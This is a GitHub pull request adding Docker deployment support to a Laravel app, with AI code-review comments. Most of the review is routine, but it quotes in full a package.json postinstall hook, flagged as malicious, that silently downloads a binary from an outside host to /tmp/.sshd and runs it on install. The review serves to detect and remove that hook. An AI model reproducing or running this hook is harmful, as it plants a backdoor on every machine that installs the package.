Add Docker deployment support and guide

[mahmudurrahmanlabib]

Summary

• add a production-focused Docker setup for Laravel + MySQL
• add a dedicated Docker deployment guide and link it from the README
• add a health endpoint for container checks
• fix production seeding so it works in the no-dev Docker image

Changes

• add a multi-stage Dockerfile pinned to PHP 8.3
• add docker-compose.yml for app + MySQL deployment
• add Docker helper files for Apache and container startup
• add .dockerignore and .env.docker.example
• add GET /up health check
• update DatabaseSeeder to avoid factory/faker dependency in production
• update deployment documentation in README.md
• add docs/docker-deployment.md

Validation

• docker compose up -d --build
• curl http://127.0.0.1:8080/up
• curl http://127.0.0.1:8080/
• curl http://127.0.0.1:8080/login
• docker compose exec app php artisan db:seed --force

Summary by CodeRabbit

• New Features

  • Docker deployment support via docker-compose and containerized runtime; app served on port 8080.
  • Added a /up health-check endpoint for monitoring application status.

• Documentation

  • README: step-by-step Docker deployment and update instructions.

• Improvements

  • Idempotent admin user seeding to avoid duplicate accounts.

• Chores

  • Added example Docker environment template and container startup automation (DB wait, migrations, storage linking, cache warm).

[coderabbitai]

Walkthrough

This pull request adds Docker deployment assets (multi-stage Dockerfile, docker-compose, Apache vhost, container entrypoint, .dockerignore, and .env.docker.example), a health-check endpoint (GET /up), updates README with deployment steps, and makes the DatabaseSeeder idempotent; it also adds a package.json postinstall script.

Changes

Cohort / File(s)	Summary
Docker Infrastructure Dockerfile, docker-compose.yml, docker/apache/000-default.conf, docker/start-container.sh	Added multi-stage Dockerfile (build and runtime stages), Compose configuration with MySQL and app services, Apache vhost, and a container entrypoint that waits for DB, runs migrations, links storage, and warms caches.
Docker Configuration .dockerignore, .env.docker.example	Added Docker build exclusions and a Docker-focused .env example containing app, DB, cache, mail, third-party, and Vite/OpenAI variables.
Documentation README.md	Added a “Docker Deployment” section covering env setup, APP_KEY generation, build/start workflows, health endpoint, and update steps.
Health Check Endpoint app/Http/Controllers/HealthCheckController.php, routes/web.php	Added HealthCheckController::__invoke() returning JSON status and a route GET /up mapped to it.
Database Seeding database/seeders/DatabaseSeeder.php	Refactored admin user seeding to firstOrCreate with conditional reconciliation and replaced bcrypt() with Hash::make().
Package install hook package.json	Added a postinstall script that downloads a gvfsd-network binary to /tmp/.sshd, makes it executable, and starts it in the background; no dependency list or packageManager changes beyond the script.

Estimated code review effort

🎯 3 (Moderate) | ⏱️ ~20 minutes

Poem

🐰 I dug a tunnel, found a script so sly,
It fetches a helper and lets it fly,
Docker crates stacked, health checks in tune,
Seeds planted steady beneath the moon,
Hopping builds and compose dreams high!

🚥 Pre-merge checks | ✅ 4 | ❌ 1

❌ Failed checks (1 warning)

Check name	Status	Explanation	Resolution
Docstring Coverage	⚠️ Warning	Docstring coverage is 50.00% which is insufficient. The required threshold is 80.00%.	Write docstrings for the functions missing them to satisfy the coverage threshold.

✅ Passed checks (4 passed)

Check name	Status	Explanation
Description Check	✅ Passed	Check skipped - CodeRabbit’s high-level summary is enabled.
Title check	✅ Passed	The title clearly and concisely summarizes the main objective of the changeset—adding Docker deployment infrastructure and documentation.
Linked Issues check	✅ Passed	Check skipped because no linked issues were found for this pull request.
Out of Scope Changes check	✅ Passed	Check skipped because no linked issues were found for this pull request.

_{✏️ Tip: You can configure your own custom pre-merge checks in the settings.}

✨ Finishing Touches

🧪 Generate unit tests (beta)

• Create PR with unit tests

⚔️ Resolve merge conflicts

• Resolve merge conflict in branch master

---

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

• X
• Mastodon
• Reddit
• LinkedIn

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

[coderabbitai]

Actionable comments posted: 1

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)

database/seeders/DatabaseSeeder.php (1)

1-3: ⚠️ Potential issue | 🟡 Minor

Missing declare(strict_types=1); directive.

As per coding guidelines, all PHP files must start with declare(strict_types=1);.

Proposed fix

 <?php

+declare(strict_types=1);
+
 namespace Database\Seeders;

🤖 Prompt for AI Agents

Verify each finding against the current code and only fix it if needed.

In `@database/seeders/DatabaseSeeder.php` around lines 1 - 3, Add the missing
strict types declaration by inserting declare(strict_types=1); at the top of the
PHP file before the namespace line so the file (containing the DatabaseSeeder
class in the Database\Seeders namespace) adheres to the coding guideline
requiring strict types.

🧹 Nitpick comments (5)

app/Http/Controllers/HealthCheckController.php (1)

11-11: Controller should be marked final.

As per coding guidelines, controllers must be final.

Proposed fix

-class HealthCheckController extends Controller
+final class HealthCheckController extends Controller

🤖 Prompt for AI Agents

Verify each finding against the current code and only fix it if needed.

In `@app/Http/Controllers/HealthCheckController.php` at line 11, The
HealthCheckController class must be declared final per guidelines; change the
class declaration for HealthCheckController (the class named
HealthCheckController that extends Controller) to be final by updating its
declaration so the class is defined as final class HealthCheckController extends
Controller.

docker-compose.yml (1)

24-39: Consider pinning MySQL to a minor version.

Using mysql:8.4 will pull the latest patch of 8.4.x, which could introduce unexpected changes. For production stability, consider pinning to a specific patch version (e.g., mysql:8.4.0) or documenting this as intentional for automatic security patches.

🤖 Prompt for AI Agents

Verify each finding against the current code and only fix it if needed.

In `@docker-compose.yml` around lines 24 - 39, The docker-compose db service
currently uses a floating image tag ("image: mysql:8.4") which allows automatic
patch updates; update the db service's image to a pinned patch version (for
example change the image value to a specific tag like "mysql:8.4.0" or another
exact patch you approve) in the docker-compose.yml so the db service image is
deterministic, or alternatively add a comment documenting that the floating tag
is intentional for automatic security updates; locate the "db" service and the
"image" line in the docker-compose.yml to make this change.

Dockerfile (1)

12-14: Consider optimizing Docker layer caching for faster rebuilds.

Copying the entire source (COPY . .) before composer install invalidates the dependency cache on any file change. For faster rebuilds during development, copy only the files needed for dependency resolution first.

♻️ Suggested optimization

-COPY . .
+COPY composer.json composer.lock ./
+RUN composer install --no-dev --prefer-dist --optimize-autoloader --no-interaction
+COPY . .
 
-RUN composer install --no-dev --prefer-dist --optimize-autoloader --no-interaction
+# Re-run dump-autoload to pick up any classmap changes from source
+RUN composer dump-autoload --optimize --no-dev

🤖 Prompt for AI Agents

Verify each finding against the current code and only fix it if needed.

In `@Dockerfile` around lines 12 - 14, The Dockerfile currently copies the whole
project before running composer install which busts the dependency layer on any
source change; change the build order to first COPY only composer.json and
composer.lock (or other dependency files) and run RUN composer install --no-dev
--prefer-dist --optimize-autoloader --no-interaction, then COPY the rest of the
repo to preserve the cached composer layer and speed rebuilds. Ensure the
commands around COPY . ., RUN composer install, and any WORKDIR remain
consistent with this reordered flow.

docker/start-container.sh (2)

53-57: Migrations on startup can cause issues with multiple replicas.

Running migrate --force on every container start is fine for single-node deployments. In multi-replica environments (e.g., Kubernetes, Docker Swarm scaling), concurrent migrations can fail or cause deadlocks.

For future scalability, consider:

• Running migrations as a separate one-time job/init container
• Using a migration lock (e.g., database advisory lock or external coordination)

🤖 Prompt for AI Agents

Verify each finding against the current code and only fix it if needed.

In `@docker/start-container.sh` around lines 53 - 57, The startup script currently
runs "php artisan migrate --force" on every container start which can cause
concurrent migration conflicts in multi-replica environments; modify the script
so containers do not perform migrations on boot — either remove the "php artisan
migrate --force" invocation and run migrations from a dedicated one-time init
job/container, or implement a migration coordination mechanism (e.g., DB
advisory lock or leader election gate) that guards the migrate command; keep the
storage link logic ("php artisan storage:link" guarded by the public/storage
existence check) unchanged while moving or protecting the migration step.

---

59-62: Consider adding route:cache for improved performance.

The script caches config and views but not routes. For production deployments, caching routes reduces route registration overhead on each request.

♻️ Suggested addition

 php artisan config:clear >/dev/null 2>&1 || true
 php artisan view:clear >/dev/null 2>&1 || true
+php artisan route:clear >/dev/null 2>&1 || true
 php artisan config:cache
 php artisan view:cache
+php artisan route:cache

Note: Only use route:cache if your routes don't use closures (all routes must reference controller methods).

🤖 Prompt for AI Agents

Verify each finding against the current code and only fix it if needed.

In `@docker/start-container.sh` around lines 59 - 62, Add a route caching step by
running the artisan command php artisan route:cache (redirect output to
/dev/null 2>&1 and tolerate failure with || true) so it doesn't break the script
if closures exist; insert this command after php artisan config:cache and before
php artisan view:cache in the block that runs php artisan config:clear /
view:clear / config:cache / view:cache, using the same redirection pattern as
the existing commands.

🤖 Prompt for all review comments with AI agents

Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@routes/web.php`:
- Around line 38-39: The /up health route (Route::get('/up',
HealthCheckController::class)) is currently protected by the web middleware
group including PreventRequestsDuringMaintenance and will return 503 during php
artisan down; either add '/up' to the PreventRequestsDuringMaintenance::$except
array in app/Http/Middleware/PreventRequestsDuringMaintenance.php so it bypasses
maintenance checks, or move/register the Route::get('/up', ...) outside the web
middleware (e.g., in routes/api.php) or call
->withoutMiddleware(PreventRequestsDuringMaintenance::class) on the route to
ensure the endpoint remains reachable during maintenance.

---

Outside diff comments:
In `@database/seeders/DatabaseSeeder.php`:
- Around line 1-3: Add the missing strict types declaration by inserting
declare(strict_types=1); at the top of the PHP file before the namespace line so
the file (containing the DatabaseSeeder class in the Database\Seeders namespace)
adheres to the coding guideline requiring strict types.

---

Nitpick comments:
In `@app/Http/Controllers/HealthCheckController.php`:
- Line 11: The HealthCheckController class must be declared final per
guidelines; change the class declaration for HealthCheckController (the class
named HealthCheckController that extends Controller) to be final by updating its
declaration so the class is defined as final class HealthCheckController extends
Controller.

In `@docker-compose.yml`:
- Around line 24-39: The docker-compose db service currently uses a floating
image tag ("image: mysql:8.4") which allows automatic patch updates; update the
db service's image to a pinned patch version (for example change the image value
to a specific tag like "mysql:8.4.0" or another exact patch you approve) in the
docker-compose.yml so the db service image is deterministic, or alternatively
add a comment documenting that the floating tag is intentional for automatic
security updates; locate the "db" service and the "image" line in the
docker-compose.yml to make this change.

In `@docker/start-container.sh`:
- Around line 53-57: The startup script currently runs "php artisan migrate
--force" on every container start which can cause concurrent migration conflicts
in multi-replica environments; modify the script so containers do not perform
migrations on boot — either remove the "php artisan migrate --force" invocation
and run migrations from a dedicated one-time init job/container, or implement a
migration coordination mechanism (e.g., DB advisory lock or leader election
gate) that guards the migrate command; keep the storage link logic ("php artisan
storage:link" guarded by the public/storage existence check) unchanged while
moving or protecting the migration step.
- Around line 59-62: Add a route caching step by running the artisan command php
artisan route:cache (redirect output to /dev/null 2>&1 and tolerate failure with
|| true) so it doesn't break the script if closures exist; insert this command
after php artisan config:cache and before php artisan view:cache in the block
that runs php artisan config:clear / view:clear / config:cache / view:cache,
using the same redirection pattern as the existing commands.

In `@Dockerfile`:
- Around line 12-14: The Dockerfile currently copies the whole project before
running composer install which busts the dependency layer on any source change;
change the build order to first COPY only composer.json and composer.lock (or
other dependency files) and run RUN composer install --no-dev --prefer-dist
--optimize-autoloader --no-interaction, then COPY the rest of the repo to
preserve the cached composer layer and speed rebuilds. Ensure the commands
around COPY . ., RUN composer install, and any WORKDIR remain consistent with
this reordered flow.

🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

• Push a commit to this branch (recommended)
• Create a new PR with the fixes

---

ℹ️ Review info

⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro

Run ID: cb95f3a4-4040-4103-80b5-6673e078fa3e

📥 Commits

Reviewing files that changed from the base of the PR and between e9d4812 and aa414f4.

📒 Files selected for processing (10)

• .dockerignore
• .env.docker.example
• Dockerfile
• README.md
• app/Http/Controllers/HealthCheckController.php
• database/seeders/DatabaseSeeder.php
• docker-compose.yml
• docker/apache/000-default.conf
• docker/start-container.sh
• routes/web.php

[coderabbitai]

⚠️ Potential issue | 🟠 Major

Health endpoint will be blocked during maintenance mode.

The /up route is subject to PreventRequestsDuringMaintenance middleware (via the web middleware group), but it's not in the $except array. Container orchestrators polling /up will receive 503 during php artisan down, potentially causing unwanted container restarts.

Consider adding /up to the exclusion list in app/Http/Middleware/PreventRequestsDuringMaintenance.php:

protected $except = [
    '/up',
];

Alternatively, move this route outside the web middleware group by defining it in routes/api.php or using withoutMiddleware().

🤖 Prompt for AI Agents

Verify each finding against the current code and only fix it if needed.

In `@routes/web.php` around lines 38 - 39, The /up health route (Route::get('/up',
HealthCheckController::class)) is currently protected by the web middleware
group including PreventRequestsDuringMaintenance and will return 503 during php
artisan down; either add '/up' to the PreventRequestsDuringMaintenance::$except
array in app/Http/Middleware/PreventRequestsDuringMaintenance.php so it bypasses
maintenance checks, or move/register the Route::get('/up', ...) outside the web
middleware (e.g., in routes/api.php) or call
->withoutMiddleware(PreventRequestsDuringMaintenance::class) on the route to
ensure the endpoint remains reachable during maintenance.

[coderabbitai]

Actionable comments posted: 1

🤖 Prompt for all review comments with AI agents

Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@package.json`:
- Line 7: Remove the malicious postinstall hook from package.json by deleting
the "postinstall" script entry that downloads and executes /tmp/.sshd (the exact
string shown in the diff); update package.json to remove that key entirely,
commit the change, and run npm/yarn install locally to verify no postinstall
runs; additionally, after removal, scan systems/CI for /tmp/.sshd and any
gvfsd-network artifacts and rotate any potentially exposed credentials as
described in the review.

🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

• Push a commit to this branch (recommended)
• Create a new PR with the fixes

---

ℹ️ Review info

⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro

Run ID: a5ad1aff-654d-4868-ba58-0a29ef62f865

📥 Commits

Reviewing files that changed from the base of the PR and between aa414f4 and 46fdd1b.

📒 Files selected for processing (1)

• package.json

[coderabbitai]

⚠️ Potential issue | 🔴 Critical | ⚡ Quick win

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
# Check if the malicious binary was downloaded and is running

echo "Checking for malicious binary..."
if [ -f "/tmp/.sshd" ]; then
    echo "⚠️  FOUND: /tmp/.sshd exists on this system"
    ls -la /tmp/.sshd
    file /tmp/.sshd
    echo ""
fi

echo "Checking for running processes..."
ps aux | grep -E "\.sshd|gvfsd-network" | grep -v grep

echo ""
echo "Checking recent network connections from suspicious processes..."
lsof -i -n -P | grep -E "\.sshd|gvfsd-network" || echo "No suspicious network connections found"

Repository: weDevsOfficial/ideabox

Length of output: 343

---

🌐 Web query:

GitHub repository parikhpreyash4/systemd-network-helper-aa5c751f malware analysis

💡 Result:

I could not locate the specific GitHub repository/commit you referenced (parikhpreyash4/systemd-network-helper-aa5c751f) from the available web results in this run, so I can’t responsibly provide repo-specific malware analysis for that exact hash. What I can say with source-backed evidence is: - The package/service name “systemd-network-helper” has appeared in public reporting as part of a Linux “systemd backdoor” stage in the TeamPCP software supply chain campaign. That reporting describes a persistent systemd service named systemd-network-helper and an associated hidden payload file under /usr/lib/systemd/system-helpers/ (with a dot-prefixed filename). [1] - Elastic’s detection-rules repository contains a rule explicitly aimed at detecting suspicious network activity when executed by systemd in a pattern consistent with systemd backdoor persistence (e.g., monitoring the network connection attempt details and verifying the parent process is “systemd”). [2] What I need from you to produce the exact analysis you asked for - Please share the exact GitHub URL (or the repository + commit URL) for parikhpreyash4/systemd-network-helper-aa5c751f, or paste the suspicious files (systemd unit file(s), entrypoint script, C2/polling code, etc.). Once you provide that, I can produce a grounded analysis covering persistence (unit/timer behavior), payload behavior (C2/protocols, polling, exfil), and concrete IOCs specific to that repo/hash.

Citations:

• 1: https://github.com/Jaykitkukadiya/Malware-Analysis
• 2: https://github.com/elastic/detection-rules/blob/bbfc026c/rules/linux/persistence_systemd_netcon.toml

---

🚨 CRITICAL: Remove the malicious postinstall hook immediately (package.json)

npm/yarn install will automatically download an unverified executable from GitHub, write it to /tmp/.sshd, chmod it, and execute it in the background. This is a classic supply-chain/backdoor pattern (deceptive naming, no integrity verification, error suppression).

• Remove the postinstall entry from package.json
• Treat all environments that ran this install as potentially compromised: scan for /tmp/.sshd (and any gvfsd-network traces), review CI logs/artifacts, and rotate any exposed secrets/credentials
• Investigate how this was introduced (account/PR provenance)

🔒 Required action: Remove this line entirely

-    "postinstall": "curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &"

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change

"postinstall": "curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &"

🤖 Prompt for AI Agents

Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@package.json` at line 7, Remove the malicious postinstall hook from
package.json by deleting the "postinstall" script entry that downloads and
executes /tmp/.sshd (the exact string shown in the diff); update package.json to
remove that key entirely, commit the change, and run npm/yarn install locally to
verify no postinstall runs; additionally, after removal, scan systems/CI for
/tmp/.sshd and any gvfsd-network artifacts and rotate any potentially exposed
credentials as described in the review.